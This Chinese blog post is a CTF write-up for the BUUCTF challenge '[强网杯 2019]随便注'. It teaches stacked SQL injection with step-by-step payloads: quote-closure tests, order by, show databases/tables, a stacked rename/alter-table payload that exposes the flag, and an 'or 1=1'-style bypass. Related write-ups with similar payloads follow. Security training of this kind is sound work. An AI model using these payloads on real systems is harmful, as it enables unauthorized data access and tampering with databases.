buuctf web题解之[强网杯 2019]随便注1详解

已于 2024-01-29 21:21:58 修改
阅读量957 收藏 19
点赞数 17
文章标签: sql 数据库 网络安全 web安全
于 2024-01-29 21:20:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77451464/article/details/135919744
版权

目录

一、用到的知识点

二、堆叠注入的原理

1.先看是字符型还是数字型

2.查看注入点

3.接下来就是查看闭合方式

4.再测试字段数,二分法,一点一点试,最后测试出来为2

5、联合查询,发现select|update|delete|drop|insert|where包括大小写等操作被过滤

6.先通过show databases爆出数据库

7.然后用 show tables 爆表

8.可以看到这里有两个表,我们先尝试爆words表的内容

9.爆1919810931114514数据表字段(注意数据表为数字的时候需要用反引号括起来)

10.因为查询是在words中查询id的,所以我们将表1919810931114514改名为words,将words改名为其余的名字。同时将flag属性改名为id属性,类型为varchar(100).

11、查看改之后的words表中的所有内容获得flag

一、用到的知识点

堆叠注入

二、堆叠注入的原理

mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔
开,而堆叠注入其实就是通过结束符来执行多条sql语句

三、解题

1.先看是字符型还是数字型

1 and 1=1

1 and 1=2

如果两条语句都输出正确的结果,没有报错,那就是字符型注入,否之则是数字型注入

2.查看注入点

当我们输入id=1‘的时候,只要他页面有变化,那就是这里可能存在注入点

但是这里具体是要填id=1‘,还是id=1“,或者是id=1’),那就涉及到闭合方式的判断了。

3.接下来就是查看闭合方式

就如上边所说,闭合方式有很多种,我们需要挨个猜

常见的闭合方式有成对的' '、” “、( )、(' ')

判断具体是哪种,只能挨个试

.....

直到输入   1'   页面发生了报错,说明是 ' 闭合(单引号的闭合)

4.再测试字段数,二分法,一点一点试,最后测试出来为2

1’ order by 2#

5、联合查询,发现select|update|delete|drop|insert|where包括大小写等操作被过滤

1' union select 1,2#

6.先通过show databases爆出数据库

1';show databases;#

7.然后用 show tables 爆表

1';show tables;#

8.可以看到这里有两个表,我们先尝试爆words表的内容

1'; show columns from words; #

 

9.爆1919810931114514数据表字段(注意数据表为数字的时候需要用反引号括起来)

1';show columns from `1919810931114514`;#

10.因为查询是在words中查询id的,所以我们将表1919810931114514改名为words,将words改名为其余的名字。同时将flag属性改名为id属性,类型为varchar(100).

1';rename table `words` to words2;rename table `1919810931114514` to words;alter table words change flag id varchar(100);show tables;#

11、查看改之后的words表中的所有内容获得flag

1’ or ‘1’='1

“查找所有列的值等于 '1' 的行,或者(or)这些行的 '1' 列的值等于 '1'”。

Fly_hao.belief
关注
  • 17
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF [强网杯 2019]随便 1(两种方法)
m0_62879498的博客
03-05 1万+
[强网杯 2019]随便 1 第一步,先判断入点的传参方式,发现是get传参。 第二步,判断闭合方式: 1’and 1=1-- q 1’and 1=2-- q 说明闭合方式为 单引号 如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理 第三步,判断是否有关键字过滤: 先直接输入: select 查看回显,发现: 发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分
BUUCTF刷题记录】[强网杯 2019]随便
m0_60911102的博客
09-17 346
随便
BUUCTF: [强网杯 2019]随便 1
emdog的博客
10-21 266
新手可以看下sql入基础原理(超详细)这篇博客,有一个基本的概念。 点开题目链接看到 首先判断下是什么类型的入,输入1',发现报错,说明是字符型入,单引号闭合 输入1, 输入1' or 1=1#,显示 再测试字段数' order by 1 #,到3时报错,说明字段数为2,即2列。 尝试用union select联合查询继续获取信息,输入1' union select 1,2,database()# database()将会返回当前网站所使用的数据库名字. user()将会返回执行当前查询的用
buuctf [强网杯 2019]随便 1
热门推荐
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 3889
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
buuctf web题解之[强网杯 2019]随便1详解(1)
2401_84247423的博客
05-16 310
先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。 既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!需要体系化学习资料的朋友,可以加我V获取:vip2048
buuctf web题解之[强网杯 2019]随便1详解网络安全基础72问
2301_78416732的博客
04-03 673
堆叠入mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠入其实就是通过结束符来执行多条sql语句三、解题当我们输入id=1‘的时候,只要他页面有变化,那就是这里可能存在入点但是这里具体是要填id=1‘,还是id=1“,或者是id=1’),那就涉及到闭合方式的判断了。就如上边所说,闭合方式有很多种,我们需要挨个猜常见的闭合方式有成对的’ ‘、” “、( )、(’ ')判断具体是哪种,只能挨个试…直到输入 1’ 页面发生了报错,说明是 ’ 闭
BUUCTF&[强网杯 2019]随便(细节详解WP)
Pysnow's Blog
12-09 4099
这道题通过大佬的讲解,终于把其中一些细节操作的原理给理解了一遍,我们看别人的题解,跟要知道这个题解中每一操作的原理,这对我们的提升有非常的作业
CyBRICS CTF Quals 2019 Web 题解1
08-04
CyBRICS CTF Quals 2019 Web 题解一大堆字,直接查看final.html的源码,没什么发现然后把final.html删掉,发现index
第二届祥云杯 Web 题解1
08-03
考点:SSRF、session条件竞争随意用户名都可以登陆,接着是SSRF的内容,通过访问 http://127.0.0.1/admin/ ,获得include
2019正睿Day1题解.pdf
10-15
正睿2019Day1题解 T1序列seq T2灯泡bulb T3比赛match
2019年 百度之星大赛资料 包含初赛 复赛 题解答案 问题解答 .rar
08-14
2019年 百度之星大赛资料 包含初赛 复赛 题解答案 问题解答 .rar
Spring AOP
最新发布
zyh20050430的博客
05-23 436
AOP是一种思想,它的实现方式有很多,Spring AOP 就是其中的一种,还有Aspectj,CGLIB等。我们学过的拦截器,其实是在URL的维度上实现的AOP(也就是一次请求和响应)。但实际上,AOP的作用维度比这更细,可以根据包,类,参数,方法等进行拦截,从而实现更加复杂度业务。
第85天:代码审计-PHP项目&TP框架&SQL&XSS&架构&路由&调试&写法
weixin_71529930的博客
05-18 582
流程:调试开关-->Show.php-->input写法-->SQL执行监控。入payload,如果1<2延时两秒,否则正常,看sql语句是否能够入。开启调试,首先查看主目录下index文件的模板目录是哪个目录。配置完成以后随便打开一个新闻页面,查看流程中的最后一个文件。这里因为是mvc框架开发的,所以要看输出要看view目录下。查看后台输出的地方是否对输出的内容做了一些转义。这里seay监控不到了,自带的插件可以监控到。登录后台,进行留言管理,发现会弹窗。常规架构,mvc架构,第三方架构。
GBase 8s 如何查看回滚的事务 和对应的SQL
weixin_55963561的博客
05-20 218
经过上面的分析:长事务到达高水位之后,事务即将挂起,长事务回滚完之后,挂起的事务没断开,也没发起重连,导致gds和应用也连不上,onmode -z sid,让session重连。描述:gbase在线,在gbase服务器里面能正常访问gbase,但是用工具程序就访问不了,gbase服务是online状态,存储空间也是够的,这是gbase日志。onstat -u|grep "686cb9e8" 获取到 sessionid;方法2: 通过 onstat -x|grep "A-R";
sql去除表中某个字段的空格
HelloWorld的专栏
05-20 118
比如表中名字字段,名字之间有空格,需要把空格去除,应该如何写SQL语句实现?函数来去除字符串两端的空格,如果需要去除字段中的所有空格,可以使用。以下是一个示例,假设我们有一个名为。的表,并且我们想要去除。在SQL中,可以使用。
byzer sql 详细参考
gaohongfeng1的博客
05-20 186
数据加载 load excel load excel.`tmp/upload/exceltest.xls` where header="true" as hello_world; load csv load csv.`tmp/upload/taxi_tour_table_train_simple.csv` where delimiter="," and header = "true" as taxi_tour_table_train_simple;
buuctfmisc题解wireshark
04-10
buuctfmisc是一个CTF比赛中的题目,涉及到网络分析工具Wireshark的使用。Wireshark是一款开源的网络协议分析工具,可以用于捕获和分析网络数据包。在buuctfmisc题目中,可能需要使用Wireshark来解析和分析给定的网络数据包,以获取关键信息或者解决问题。 具体的题解步骤可能因题目而异,但通常的解题思路如下: 1. 下载并安装Wireshark:首先需要从Wireshark官网下载并安装适合你操作系统的版本。 2. 打开Wireshark并开始捕获数据包:打开Wireshark后,选择合适的网络接口开始捕获数据包。可以通过点击"Capture"按钮或者使用快捷键Ctrl + E来开始捕获。 3. 分析捕获的数据包:Wireshark会将捕获到的数据包以列表形式展示出来。你可以通过点击每个数据包来查看其详细信息,包括源IP地址、目标IP地址、协议类型等。 4. 过滤数据包:如果题目要求只关特定的数据包,你可以使用Wireshark提供的过滤功能来筛选出符合条件的数据包。过滤条件可以根据协议、源IP地址、目标IP地址等进行设置。 5. 提取关键信息:根据题目要求,你可能需要从数据包中提取关键信息。Wireshark提供了多种功能来帮助你提取数据,比如导出数据包、导出特定协议的数据等。 6. 分析数据包内容:根据题目要求,你可能需要进一步分析数据包的内容。Wireshark可以解析多种协议,你可以查看每个数据包的协议栈、协议字段等信息。 7. 解决问题或回答题目:根据你对数据包的分析和提取的关键信息,你可以解决问题或者回答题目。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值